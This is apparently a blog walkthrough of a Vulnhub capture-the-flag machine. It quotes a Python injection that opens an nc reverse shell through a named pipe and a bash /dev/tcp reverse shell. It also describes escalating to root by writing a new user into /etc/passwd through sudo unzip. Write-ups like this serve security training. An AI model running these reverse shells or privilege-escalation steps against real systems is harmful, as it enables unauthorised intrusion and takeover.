Vulnhub – InfoSecWarrior CTF 2020 02 Walkthrough

Scanning the box with nmap –A –T4 –p- –vv

Connecting to port 56563 with telnet:

Ok there is a trick to it, we can use a command instead of a number:

__import__(‘os’).system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444>/tmp/f’)

And on our listening port we get a shell:

We escape the shell with command python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ and then we view the file bla2-note:

The pass czNjcjN0 is a base64 code which translate to s3cr3t, now let’s view the /etc/group file:

The password didn’t work with bla or ck04, ok we still have ssh service let’s take a look at it:

The password didn’t work either, but this might work … cat /etc/*-release gave us:

The CODENAME=bionic as the banner said “Enumerate Hostname and Distro’s codename of this box And try to get Secure Shell” now we use bionic as the password:

Ok that’s weird we got the user flag but we got kicked out so let’s try this we going to write bash –p:

Yes it worked, but we got stuck as no commands is displaying results so we going to make another reverse shell using bash -i >& /dev/tcp/ 0>&1

Now user ck04 got sudo privilege:

And the user bla got sudo privilege too:

Ok now we are going to add a new user with a root privilege to the passwd file in the /etc:

Now we copy the /etc/passwd to our location in bla home directory and edit it and put inside it


Now we going to use the unzip command that we got from sudo –l, first we zip it and then unzip it:

Now we su hacker and the password is 123456

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s